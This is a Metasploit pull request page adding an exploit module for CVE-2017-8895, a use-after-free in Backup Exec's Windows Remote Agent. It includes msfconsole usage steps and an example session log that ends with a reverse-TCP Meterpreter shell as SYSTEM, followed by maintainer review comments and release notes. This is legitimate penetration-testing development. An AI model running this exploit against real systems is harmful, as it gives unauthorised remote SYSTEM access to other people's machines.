Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Exploit module for CVE-2017-8895, UAF in Backup Exec Windows agent #8442

Merged
merged 2 commits into from Jun 28, 2017
Merged

Exploit module for CVE-2017-8895, UAF in Backup Exec Windows agent #8442

merged 2 commits into from Jun 28, 2017

Conversation

megabug
Copy link
Contributor

@megabug megabug commented May 23, 2017

This module exploits a use-after-free vulnerability in the handling of SSL NDMP connections in Veritas/Symantec Backup Exec's Remote Agent for Windows. When SSL is re-established on a NDMP connection that previously has had SSL established, the BIO struct for the connection's previous SSL session is reused, even though it has previously been freed.

Successful exploitation will give remote code execution as the user of the Backup Exec Remote Agent for Windows service, almost always NT AUTHORITY\SYSTEM.

Verification

  1. Install the Backup Exec server on a host. A trial version of Backup Exec can be downloaded from Veritas' website; currently the download is available here.
  2. Install the Backup Exec Remote Agent for Windows on another host, either manually or through the server's remote agent installation feature. Note that in this contrived test situation you should be sure to let the agent run for a few minutes before continuing so it can finish initial startup work that otherwise interferes with the exploit's heap manipulation.
  3. Start msfconsole.
  4. Select the module and configure it with, at minimum, the address of the host running the remote agent: 
    use exploit/windows/backupexec/ssl_uaf
set RHOST [REMOTE AGENT HOST]
  5. Check the service is running and potentially vulnerable with the check command.
  6. Select a target version using set target [TARGET].
  7. Select a payload and its options; for example: 
    set payload windows/x64/meterpreter/reverse_tcp
set LHOST [METASPLOIT HOST]
  8. Start the exploit using the exploit command.
  9. Hopefully get a NT AUTHORITY\SYSTEM shell :)

An example session is as follows:

msf > use exploit/windows/backupexec/ssl_uaf
msf exploit(ssl_uaf) > set RHOST win10
RHOST => win10
msf exploit(ssl_uaf) > check

Hostname: WIN10
OS type: Windows NT
OS version: Major Version=10 Minor Version=0 Build Number=14393 ServicePack Major=0 ServicePack Minor=0 SuiteMask=256 ProductType=1 ProcessorType=AMD64
Host ID: XXXX::XXXX:XXXX:XXXX:XXXX
Vendor: VERITAS Software, Corp.
Product: Remote Agent for NT
Revision: 9.2
[*] win10:10000 The target appears to be vulnerable.
msf exploit(ssl_uaf) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x64
   1   Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x86
   2   Backup Exec 14 (14.1 / revision 9.1), Windows <= 7 x64
   3   Backup Exec 14 (14.1 / revision 9.1), Windows <= 7 x86
   4   Backup Exec 15 (14.2 / revision 9.2), Windows >= 8 x64
   5   Backup Exec 15 (14.2 / revision 9.2), Windows >= 8 x86
   6   Backup Exec 15 (14.2 / revision 9.2), Windows <= 7 x64
   7   Backup Exec 15 (14.2 / revision 9.2), Windows <= 7 x86
   8   Backup Exec 16 (16.0 / revision 9.2), Windows >= 8 x64
   9   Backup Exec 16 (16.0 / revision 9.2), Windows >= 8 x86
   10  Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x64
   11  Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x86


msf exploit(ssl_uaf) > set target 4
target => 4
msf exploit(ssl_uaf) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ssl_uaf) > set LHOST 10.123.1.1
LHOST => 10.123.1.1
msf exploit(ssl_uaf) > exploit

[*] Started reverse TCP handler on 10.123.1.1:4444
[*] win10:10000 - Connecting sockets...
[*] win10:10000 - CA certificate ID = 8120a0e9
[*] win10:10000 - Getting and handling a certificate signing request...
[*] win10:10000 - Agent certificate ID = 430b56d0
[*] win10:10000 - Testing certificate...
[*] win10:10000 - Spraying TLS extensions...
[*] win10:10000 - Entering SSL mode on main socket...
[*] win10:10000 - Spraying TLS extensions...
[*] win10:10000 - Sending stages 2 to 4...
[*] win10:10000 - Closing TLS spray sockets...
[*] win10:10000 - Re-entering SSL mode on main socket...
[*] win10:10000 - Spraying stage 1...
[*] win10:10000 - Triggering UAF, attempt 1/50...
[*] Sending stage (1189423 bytes) to 10.123.1.2
[*] win10:10000 - Spraying stage 1...
[*] win10:10000 - Triggering UAF, attempt 2/50...
[*] Meterpreter session 1 opened (10.123.1.1:4444 -> 10.123.1.2:49748) at 2017-05-23 21:53:07 +1200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

More detail in the commit that adds documentation!

I appreciate that the exploit module itself is rather large, but a large part is ROPchains for multiple stages across multiple versions of both 32- and 64-bit agents. Keen to know if there's a better way that exploits normally include such ROPchains in MSF code.

In addition, this adds a new mixin, Msf::Exploit::Remote::NDMPSocket. This provides the NDMP::Socket and NDMP::Message classes to an exploit, which is used for NDMP protocol handling. There's the existing Msf::Exploit::Remote::NDMP mixin but this only allows a single socket to be used, and has limited handling of packet fragmentation and message (de-)serialisation. I realise a doubleup of functionality is not ideal, but I'm hesitant to rewrite the existing exploits that make use of the old module. Some guidance as to if this approach is acceptable or what to do instead would be great too.

@megabug
Add module for CVE-2017-8895, UAF in Backup Exec Windows agent
52363ae 
This module exploits a use-after-free vulnerability in the handling of
SSL NDMP connections in Veritas/Symantec Backup Exec's Remote Agent for
Windows. When SSL is re-established on a NDMP connection that previously
has had SSL established, the BIO struct for the connection's previous
SSL session is reused, even though it has previously been freed.

Successful exploitation will give remote code execution as the user of
the Backup Exec Remote Agent for Windows service, almost always
NT AUTHORITY\SYSTEM.
@megabug
Add documentation for CVE-2017-8895 exploit module
d530c49
@wwebb-r7
Copy link
Contributor

wwebb-r7 commented May 23, 2017
edited

Really impressive work with it being a remote uaf and all, and cynical 20-year-old-me is smirking due to all the headaches this software caused him.

I've run into the same situation with multiple large payload chains for different versions. I had a working solution at the time in selectively loading each version as needed. Unfortunately, I think that code may be gone for good. I have to step out for awhile but I'll take a look tonight.

Edit: as far as the NDMP mixin, I'll let others weigh in on what should be done; however, we're not totally adverse to the idea of rewriting existing modules if it's a significant enough improvement and isn't a monumental task.

@wwebb-r7 wwebb-r7 self-assigned this May 26, 2017
@wwebb-r7 wwebb-r7 merged commit d530c49 into rapid7:master Jun 28, 2017
wwebb-r7 added a commit that referenced this pull request Jun 28, 2017
@wwebb-r7
Land #8442, Exploit module for Backup Exec Windows Agent UaF
6349026
@wwebb-r7
Copy link
Contributor

Again, really strong first time module. Apologies that it took so long.

@wwebb-r7
Copy link
Contributor

wwebb-r7 commented Jun 28, 2017
edited by alrosenthal-r7

Release Notes

The exploits/windows/backupexec/ssl_uaf module has been added to the framework. This module exploits a use-after-free vulnerability in the handling of SSL NDMP connections in Veritas/Symantec Backup Exec's Remote Agent for Windows (CVE-2017-8895). This allows you to remotely execute code over an unauthenticated network connection.

@OJ
Copy link
Contributor

OJ commented Jun 28, 2017

+1 to this! Great PR, very nicely done.

@megabug megabug deleted the CVE-2017-8895 branch September 26, 2017 09:38
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wwebb-r7 wwebb-r7

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@megabug @wwebb-r7 @OJ @alrosenthal-r7